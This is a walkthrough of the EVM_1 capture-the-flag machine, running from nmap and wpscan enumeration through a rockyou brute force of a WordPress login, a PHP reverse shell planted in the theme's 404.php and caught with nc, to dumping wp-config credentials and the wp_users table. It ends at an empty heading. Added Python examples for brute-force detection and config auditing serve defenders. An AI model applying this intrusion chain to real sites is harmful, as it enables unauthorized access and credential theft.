EVM_1 Target Machine

Information Gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.103
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 04:08 EDT
Nmap scan report for 192.168.56.103
Host is up (0.000073s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
MAC Address: 08:00:27:06:73:F2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.41 seconds

Ports 22, 53, 80, 110, 139, 143 and 445 are open.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,53,80,110,139,143,445 192.168.56.103
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 04:08 EDT
Nmap scan report for 192.168.56.103
Host is up (0.00031s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA)
| 256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA)
|_ 256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA TOP RESP-CODES SASL AUTH-RESP-CODE UIDL PIPELINING
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: ENABLE have ID LOGINDISABLEDA0001 more post-login IMAP4rev1 IDLE listed capabilities SASL-IR OK Pre-login LOGIN-REFERRALS LITERAL+
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:06:73:F2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-06-27T08:09:05
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: ubuntu-extermely-vulnerable-m4ch1ine
| NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\x00
| Domain name: \x00
| FQDN: ubuntu-extermely-vulnerable-m4ch1ine
|_ System time: 2023-06-27T04:09:05-04:00
|_clock-skew: mean: 1h19m57s, deviation: 2h18m33s, median: -2s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.99 seconds

The operating system is Ubuntu.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,53,80,110,139,143,445 192.168.56.103
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 04:09 EDT
Nmap scan report for 192.168.56.103
Host is up (0.00024s latency).

PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wordpress/: Blog
| /info.php: Possible information file
|_ /wordpress/wp-login.php: Wordpress login page.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
MAC Address: 08:00:27:06:73:F2 (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 321.68 seconds

The vuln script scan turned up a wordpress directory and info.php. Let's try the SMB scripts first.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.56.103
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 04:25 EDT
Nmap scan report for 192.168.56.103
Host is up (0.000092s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
MAC Address: 08:00:27:06:73:F2 (Oracle VirtualBox virtual NIC)

Host script results:
| smb-enum-shares:
| account_used: guest
| \\192.168.56.103\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (ubuntu-extermely-vulnerable-m4ch1ine server (Samba, Ubuntu))
| Users: 2
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\192.168.56.103\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds

WordPress Penetration

wpscan Scan

SMB seems to offer few entry points, so let's focus on WordPress and use wpscan for information gathering.

┌──(kali㉿kali)-[~/Desktop/Clash for Windows-0.19.26-x64-linux]
└─$ wpscan --url http://192.168.56.103/wordpress --enumerate u
Type application/netcdf is already registered as a variant of application/netcdf.
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | _ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.56.103/wordpress/ [192.168.56.103]
[+] Started: Tue Jun 27 04:31:05 2023

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.103/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.103/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.103/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.103/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.4 identified (Insecure, released on 2019-10-14).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.103/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>
| - http://192.168.56.103/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>

[+] WordPress theme in use: twentynineteen
| Location: http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.5
| Style URL: http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] c0rrupt3d_brain
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.103/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jun 27 04:31:08 2023
[+] Requests Done: 53
[+] Cached Requests: 6
[+] Data Sent: 14.439 KB
[+] Data Received: 522.866 KB
[+] Memory used: 188.668 MB
[+] Elapsed time: 00:00:02

Brute-forcing the Password

We got a few directories and one user, c0rrupt3d_brain. There don't seem to be any exploitable plugin vulnerabilities, so let's try brute-forcing first.

┌──(kali㉿kali)-[~/Desktop/Clash for Windows-0.19.26-x64-linux]
└─$ wpscan --url http://192.168.56.103/wordpress -P /usr/share/wordlists/rockyou.txt -U 'c0rrupt3d_brain'
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | _ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.56.103/wordpress/ [192.168.56.103]
[+] Started: Tue Jun 27 04:42:18 2023

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.103/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.103/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.103/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.103/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.4 identified (Insecure, released on 2019-10-14).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.103/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>
| - http://192.168.56.103/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>

[+] WordPress theme in use: twentynineteen
| Location: http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.5
| Style URL: http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] photo-gallery
| Location: http://192.168.56.103/wordpress/wp-content/plugins/photo-gallery/
| Last Updated: 2023-06-02T15:32:00.000Z
| [!] The version is out of date, the latest version is 1.8.16
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.5.34 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://192.168.56.103/wordpress/wp-content/plugins/photo-gallery/css/jquery.mCustomScrollbar.min.css?ver=1.5.34
| - http://192.168.56.103/wordpress/wp-content/plugins/photo-gallery/css/styles.min.css?ver=1.5.34
| - http://192.168.56.103/wordpress/wp-content/plugins/photo-gallery/js/jquery.mCustomScrollbar.concat.min.js?ver=1.5.34
| - http://192.168.56.103/wordpress/wp-content/plugins/photo-gallery/js/scripts.min.js?ver=1.5.34
| Confirmed By:
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.103/wordpress/wp-content/plugins/photo-gallery/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.103/wordpress/wp-content/plugins/photo-gallery/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=====================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - c0rrupt3d_brain / 24992499
Trying c0rrupt3d_brain / 24992499 Time: 00:02:54 < > (10700 / 14355092) 0.07% ETA: ??:??:??

[!] Valid Combinations Found:
| Username: c0rrupt3d_brain, Password: 24992499

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jun 27 04:45:19 2023
[+] Requests Done: 10874
[+] Cached Requests: 5
[+] Data Sent: 3.854 MB
[+] Data Received: 48.842 MB
[+] Memory used: 304.754 MB
[+] Elapsed time: 00:03:00
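
A defender-side view of the run above: wpscan sent 10,874 requests to wp-login.php in three minutes, which stands out in the Apache access log even though every failed login answers 200. The following Python is an added example, not part of the original writeup or of wpscan; it assumes Apache's combined log format, the log lines are constructed, and the threshold and window size are arbitrary tuning values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" access-log line (assumed format; the sample lines below are constructed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Endpoints that WordPress credential guessing hits: the login form and XML-RPC
# (the wpscan output above lists both as reachable on this target).
LOGIN_PATHS = ("/wordpress/wp-login.php", "/wordpress/xmlrpc.php")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],   # drop any query string
        "status": int(m.group("status")),
    }


def detect_login_bruteforce(lines, threshold=20, window_seconds=60):
    """Return {ip: peak_count} for clients that POSTed to a login endpoint at least
    `threshold` times inside any sliding window of `window_seconds`.
    A failed wp-login.php POST returns 200 (the form re-renders with an error),
    so the request rate, not the status code, is the signal."""
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs inside the current window
    peak = defaultdict(int)       # ip -> largest window population seen
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] not in LOGIN_PATHS:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (q[-1] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        peak[rec["ip"]] = max(peak[rec["ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}


def sample_log():
    """Constructed log: one client hammering wp-login.php, one ordinary login, one GET."""
    def line(ip, second, method, path, status):
        return (f'{ip} - - [27/Jun/2023:04:42:{second:02d} -0400] '
                f'"{method} {path} HTTP/1.1" {status} 2873 "-" "Mozilla/5.0"')
    lines = [line("192.168.56.106", 0, "GET", "/wordpress/wp-login.php", 200)]
    lines += [line("192.168.56.106", 18 + i, "POST", "/wordpress/wp-login.php", 200)
              for i in range(30)]                       # 30 POSTs within 30 seconds
    lines += [line("192.168.56.50", 5, "POST", "/wordpress/wp-login.php", 200),
              line("192.168.56.50", 9, "POST", "/wordpress/wp-login.php", 302)]
    return lines


if __name__ == "__main__":
    for ip, n in detect_login_bruteforce(sample_log()).items():
        print(f"{ip}: {n} login POSTs within 60s")
```

Because the window is sliding per client, a legitimate user who mistypes a password twice stays well under the threshold while a wordlist run trips it within its first minute; the same counter applied to xmlrpc.php catches the multicall variant that never touches wp-login.php.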

Brute-forcing yielded the user's password, 24992499. After logging in, look at the theme editor.

404.php there gives a hint: a reverse shell can be written here. We modify php-reverse-shell.php and put it in, then request a URL that will 404; with a listener started beforehand, we get a reverse shell.

┌──(kali㉿kali)-[~/Downloads/EVM_1]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.103] 37128
Linux ubuntu-extermely-vulnerable-m4ch1ine 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
04:55:28 up 52 min, 0 users, load average: 0.05, 0.44, 1.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/$ export TERM=xterm-color
export TERM=xterm-color

Privilege Escalation

The reverse shell succeeded. Confirm we are on the right target and do some basic information gathering.

www-data@ubuntu-extermely-vulnerable-m4ch1ine:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:06:73:f2 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.103/24 brd 192.168.56.255 scope global enp0s3
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe06:73f2/64 scope link
valid_lft forever preferred_lft forever
3: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default qlen 1000
link/ether 52:54:00:c5:7d:1b brd ff:ff:ff:ff:ff:ff
inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0
valid_lft forever preferred_lft forever
4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc pfifo_fast master virbr0 state DOWN group default qlen 1000
link/ether 52:54:00:c5:7d:1b brd ff:ff:ff:ff:ff:ff
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/$ uname -a
uname -a
Linux ubuntu-extermely-vulnerable-m4ch1ine 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/$ pwd
pwd
/
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/$ sudo -l
sudo -l
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

sudo: 3 incorrect password attempts

Next, go into /var/www/html and take a look. The focus is mainly on configuration files; check whether there is a database connection password.

www-data@ubuntu-extermely-vulnerable-m4ch1ine:/var/www/html$ ls -liah
ls -liah
total 11M
276855 drwxr-xr-x 3 www-data www-data 4.0K Nov 1 2019 .
276854 drwxr-xr-x 3 root root 4.0K Oct 30 2019 ..
281328 -rw-r--r-- 1 www-data www-data 11K Nov 1 2019 index.html
282142 -rw-r--r-- 1 www-data www-data 21 Oct 30 2019 info.php
401054 drwxr-xr-x 5 www-data www-data 4.0K Nov 1 2019 wordpress
407076 -rw-r--r-- 1 www-data www-data 2.9K Oct 31 2019 wp-config.php
20482 -rw-r--r-- 1 www-data www-data 11M Oct 30 2019 wp.tar.gz
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/var/www/html$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'hackme_wp' );

/** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', '123' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );

/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );
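
The recovered wp-config.php shows three weaknesses a defender can check for mechanically: WordPress connects to MySQL as root, the password is three characters, and all eight authentication keys and salts still hold the placeholder text from wp-config-sample.php. The following Python audit is an added example, not part of the original writeup or of WordPress; the define() parser, the 32-character minimum for secrets and the hardened counterpart config are assumptions of this example, while the weak sample reuses the values found on the target.

```python
import re
import secrets

# Matches define( 'KEY', 'value' ) and define( 'KEY', true/false ) as written in wp-config.php.
DEFINE_RE = re.compile(
    r"""define\(\s*'(?P<key>[A-Z_]+)'\s*,\s*(?:'(?P<str>[^']*)'|(?P<bare>[A-Za-z0-9_]+))\s*\)"""
)
SALT_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
PLACEHOLDER = "put your unique phrase here"   # value shipped in wp-config-sample.php
MIN_SECRET_LEN = 32                           # assumed threshold; api.wordpress.org issues 64-char secrets


def parse_defines(text):
    """Collect define() constants into a dict of key -> string value."""
    cfg = {}
    for m in DEFINE_RE.finditer(text):
        cfg[m.group("key")] = m.group("str") if m.group("str") is not None else m.group("bare")
    return cfg


def audit_wp_config(text, min_password_len=12):
    """Return a list of (key, problem) tuples for weak settings in a wp-config.php."""
    cfg = parse_defines(text)
    findings = []
    for key in SALT_KEYS:
        val = cfg.get(key, "")
        if val == PLACEHOLDER or len(val) < MIN_SECRET_LEN:
            findings.append((key, "placeholder or short secret: cookie and nonce keys are predictable"))
    if cfg.get("DB_USER") == "root":
        findings.append(("DB_USER", "WordPress connects as the MySQL superuser"))
    if len(cfg.get("DB_PASSWORD", "")) < min_password_len:
        findings.append(("DB_PASSWORD", f"shorter than {min_password_len} characters"))
    if cfg.get("WP_DEBUG", "false").lower() == "true":
        findings.append(("WP_DEBUG", "debug output enabled on a served site"))
    return findings


def weak_config():
    """Excerpt of the wp-config.php recovered above (values as found on the target)."""
    salts = "\n".join(f"define( '{k}', '{PLACEHOLDER}' );" for k in SALT_KEYS)
    return f"""<?php
define( 'DB_NAME', 'hackme_wp' );
define( 'DB_USER', 'root' );
define( 'DB_PASSWORD', '123' );
define( 'DB_HOST', 'localhost' );
{salts}
define( 'WP_DEBUG', false );
"""


def hardened_config():
    """Constructed counterpart: dedicated DB user, long random password, 64-hex-char secrets."""
    salts = "\n".join(f"define( '{k}', '{secrets.token_hex(32)}' );" for k in SALT_KEYS)
    return f"""<?php
define( 'DB_NAME', 'hackme_wp' );
define( 'DB_USER', 'wp_app' );
define( 'DB_PASSWORD', '{secrets.token_urlsafe(24)}' );
define( 'DB_HOST', 'localhost' );
{salts}
define( 'WP_DEBUG', false );
"""


if __name__ == "__main__":
    for key, problem in audit_wp_config(weak_config()):
        print(f"{key}: {problem}")
    print("hardened config findings:", audit_wp_config(hardened_config()))
```

Note that a dedicated MySQL account limits what a compromised web user can reach, but it does not help with the file itself: wp-config.php here is owned by www-data with mode 644, so anyone who gets a shell as the web user can read it regardless of how strong the credentials are.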

Got the database password, 123. Let's go into the database.

www-data@ubuntu-extermely-vulnerable-m4ch1ine:/var/www/html$ mysql -uroot -p
mysql -uroot -p
Enter password: 123

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 21345
Server version: 5.7.19-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| vulnwp |
+--------------------+
5 rows in set (0.00 sec)

mysql> use vulnwp
use vulnwp
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

Let's look at the wp_users table.

mysql> select * from wp_users;
select * from wp_users;
+----+-----------------+------------------------------------+-----------------+-------------------+----------+---------------------+---------------------+-------------+-----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+-----------------+------------------------------------+-----------------+-------------------+----------+---------------------+---------------------+-------------+-----------------+
| 1 | c0rrupt3d_brain | $P$BeIRcDvfjdzumCYjeRfShVUMy8BkXf/ | c0rrupt3d_brain | vuln@localhost.ws | | 2019-10-31 21:47:00 | | 0 | c0rrupt3d_brain |
+----+-----------------+------------------------------------+-----------------+-------------------+----------+---------------------+---------------------+-------------+-----------------+
1 row in set (0.00 sec)

Hidden Files in the Home Directory

